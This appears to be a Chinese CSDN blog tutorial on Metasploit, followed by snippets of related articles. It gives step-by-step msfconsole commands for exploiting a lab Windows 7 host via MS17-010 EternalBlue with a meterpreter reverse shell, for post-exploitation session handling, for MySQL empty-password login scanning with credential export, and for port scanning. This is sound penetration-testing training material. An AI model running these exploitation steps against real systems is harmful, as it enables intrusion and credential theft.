代码编织梦想

  1. 初识MSF(渗透测试开源软件平台,一个漏洞利用框架,对计算机软件漏洞进行攻击)
    • Kali查找MSF框架:cd /usr/share/metasploit-framework,进入windows攻击模块:cd /usr/share/metasploit-framework/modules/exploits/windows
    • 学习路线:MSF了解------>安装MSF2-Linux靶机------->MSF基本使用方法------>MSF实战:攻击win7主机并远程执行命令|扫描靶机mysql服务
  2. MSF渗透测试框架介绍:

     

  3. Metasploitable2Linux 系统靶机的安装:
    • 下载安装:官网下载Metasploitable2-Linux,解压出来得到一个Metasploitable.vmx虚拟机文件,打开vmware 虚拟机,打开这个文件即可
    • 进入:复制进入虚拟机之后直接输入账号密码msfadmin/msfadmin 进入靶机
    • 切换root:切换root账号 sudo passwd root 输入密码进入修改root账号密码即可登录root账号
    • 设置静态IP:vim  /etc/network/interfaces |  修改 iface eth0 inet dhcp 为 iface eth0 inet static  | 增加ipv4地址 address 192.168.56.154,子网掩码 netmask 255.255.255.0,网关 gateway 192.168.56.2  | 重启网卡 systemctl restart network 
    • 拍摄快照
  4. Metasploit基本使用方法:
    • ​​​​​​开启MSF需要使用postgresql |  systemctl  start postgresql  ,  systemctl enable postgresql
    • Kali进入MSF命令终端输入:msfconsole  |  msfconsole -q |
    • MSF常用命令:
      • help 查看帮助信息 |  核心命令中的 connect:远程连接主机。一般用于内网渗透
      • show all 显示所有模块 | 显示所有渗透攻击模块 show exploits 等等
      • search keywords(参数)search name:mysql #查找mysql的漏洞 | 通过路径查找模块:search path:mysql |  search platform mysql:通过平台查找 | search type:exploits name:linux 搜索linux平台的exploits(渗透攻击模块)
      • 根据CVE(好比一个字典,什么字典呢,存放广泛认同的信息安全漏洞或已经暴露出来的弱点给出一个公共的名称)搜索exploit 相关模块
      • search cve:CVE-2017-8464  type:exploit 搜索这个漏洞的渗透攻击模块 |  search cve:2020 type:linux 
      • use  编号(0,1,2,3....) 使用漏洞 |  back 退出当前漏洞,不退出msf |  info 显示漏洞详细信息 | show  options  查看漏洞利用所需要的信息
      • show targets 显示这个漏洞可以利用的所有平台 | set  target 34 设置漏洞利用平台编号为34的平台 | set rhosts 192.168.56.xxx 设置目标主机ip
      • run 直接运行漏洞 | shell 进入目标机执行脚本 
  5. 实战: 使用msf渗透Win7主机并远程执行命令:
    • 前期:win7 x64旗舰版操作系统 |  利用ms17-010 这个漏洞 
    • msf6 > search ms17-010 |  设置辅助模块auxiliary 目标主机(win7)ip :use  auxiliary/scanner/smb/smb_ms17_010 ,set rhosts 192.168.x.x   | 备注:取消设置unset RHOSTS   
    • 设置攻击模块:search ms17-010 | 使用永恒之蓝漏洞(eternalblue):use exploit(windows/smb/ms17_010_eternalblue)
    • show  options |  设置目标主机(win7)ip :set RHOSTS  192.168.x.x  | 查看options配置是否正确 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp 
    • show targets 检查可攻击的目标主机 | set target 4 设置正确的可攻击的目标主机 | 检查payload 检查端口是否被占用
    •  run | exploit 开始攻击
    • 如果目标主机是win7 可以通过chcp 65001 解决乱码问题 |  backgroud 保存连接到后台 | sessions 查看所有连接
    • net user 查看所有用户 |  help 查看所有可执行的命令 | run VUC 远程监控 | session -i 4(数字) 进入连接 | run -j 保存到后台连接 | sessions -k 5(数字)  删除连接 | 
  6. 实战:使用msf扫描靶机上mysql服务的空密码
    • msf搜索mysql:search mysql |  use  auxiliary(scanner/mysql/mysql_login)使用mysql_login登录密码 
    • set  rhosts  192.168.x.x(靶机ip)|  set username root 设置mysql用户为root 
    • run |  exploid 直接执行攻击 
    • creds 列出postgrepsql 所有凭证 
    • db_export -h 查看导出帮助,导出格式(xml、pwdump) | db_export -f xml /root/bak.xml 导出所有数据库到kali /root目录下
    • 清空msf数据库:msfdb  reinit |  services 查看所有漏洞利用过的服务信息
    • hosts 查看所有连接过的主机 | db_import /root/bak.xml 导入数据库  | hosts -h查看主机帮助 | hosts -a|-d 添加|删除主机

     

  7. 基于Metasploit渗透测试的信息收集(基于辅助模块)
    • 基于TCP协议收集主机信息
      • use auxiliary/scanner/portscan/syn  (使用辅助模块下的tcp半连接扫描)
      • show missing    (显示你该设置而没有设置的参数)
      • set RHOSTS  192.168.1.1   (设置主机ip)
      • set PORTS  80   
      • run
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41755666/article/details/123614443

kail linux渗透测试教程之在metasploit中扫描-爱代码爱编程

Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器。使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络的服务信息。本节将介绍使用Metasploit中的辅助模块实现扫描。 【实例4-4】在Metasploit中,扫描目标主机。具体操作步骤如下所示: (

kali中metasploit的使用_壹个大坑的博客-爱代码爱编程_kali metasploit

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 在kali中的中有用于渗透测试的利器:metasploit Au

kali玩转metasploit 实现安全漏洞检测_ltw.hinscheung的博客-爱代码爱编程

          Metasploit就是一个漏洞框架,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏

渗透工具之msf-爱代码爱编程

转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,

最受欢迎的14款渗透测试工具-爱代码爱编程

就像任何事物都有两面,黑客既可以进行恶意的攻击破坏,同样也可以通过利用自己的技术去找到系统的漏洞、缺陷等,然后通知相关企业进行修复已获得更好的防护。 但无论是出于何种目的,对于黑客们而言,工具和脚本的使用都必不可少。所谓工欲善其事,必先利其器,本文将为大家整理介绍非常受欢迎的一些黑客工具,供大家挑选使用。 ANGRY IP SCANNER 黑客可以通

渗透测试常用工具-Metasploit-爱代码爱编程

目录 常用模块应用: [Metasploit常用模块搜集](https://blog.csdn.net/qq_38626043/article/details/105183361)后渗透模块应用:[Metasploit后渗透命令](https://blog.csdn.net/qq_38626043/article/details/104363148

内网渗透之——msf工具使用-爱代码爱编程

1.msfconsole 作用: 管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。模块介绍: exploits:攻击脚本 payloads:攻击载荷(攻击效果控制) auxiliaru:辅助模块(扫描工具等) post:后渗透模块(提取信息) encoders编码模块 nops:无操作生成器 2.msfvenom 作用: 制

阿里云部署metasploit framework-爱代码爱编程

前言 算记录一个小坑吧 正文 msf官网上在Linux上部署的命令是这样 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >

渗透工具(nmap,msf,nc)-爱代码爱编程

nmap的使用: nmap 在渗透中常用命令: 1.扫描子网 nmap 192.168.1.0/24 2.扫描全端口信息:nmap -p- 靶机ip 3.在防火墙禁止ping 的情况下使用:nmap -po 靶机ip 4.查看开放了那些端口:nmap -sT 靶机ip 5.查看存活的主机:nmap -sP 靶机ip 6.扫描隐藏端口:nmap -sS 靶

渗透常用工具-爱代码爱编程

渗透常用工具  &emnsp;BackTrack集成了大量的优秀工具,而且进行了分类。下面我们介绍几个渗透常用的工具 Nmap 最初Nmap被设计用来扫描端口的工具。但是随着时间的推移Nmap的功能变的越来越全面。网络中有多少台主机,每台主机运行的操作系统,每台主机运行的应用程序,甚至每台主机存在漏洞情况都可以用Nmap获得。 Malteg

Metasploit(MSF)渗透测试框架使用教程及基本命令-爱代码爱编程

第一章 Metasploit渗透框架介绍及体系框架 1.1 Metasploit 渗透测试框架介绍   Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。使您能够查找,利用和验证漏洞。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。 1.2 Metas

MSF渗透必用工具-就是一个漏洞框架,kali自带-爱代码爱编程

.kali桌面超时的设置方法 鼠标右击选择应用程序-设置-light桌面管理器-杂项,设置为从不。 kali 系统系统的ip地址变为127.0.0.1的处理方法:只能临时改变 ┌──(root💀oldboy)-[~] └─# dhclient -r                                                    

渗透测试神器-msf基础-爱代码爱编程

Msf基础 Metasploit-framework(用ruby写的)基础: MSF拥有世界上最大的渗透测试攻击数据库 Vulnerability:漏洞统称 expoit:攻击代码或者程序 Payload:完成实际攻击功能的代码 module:组成完整系统的基本构造块,每个模块执行特定任务 运行msf: 1.sudo servi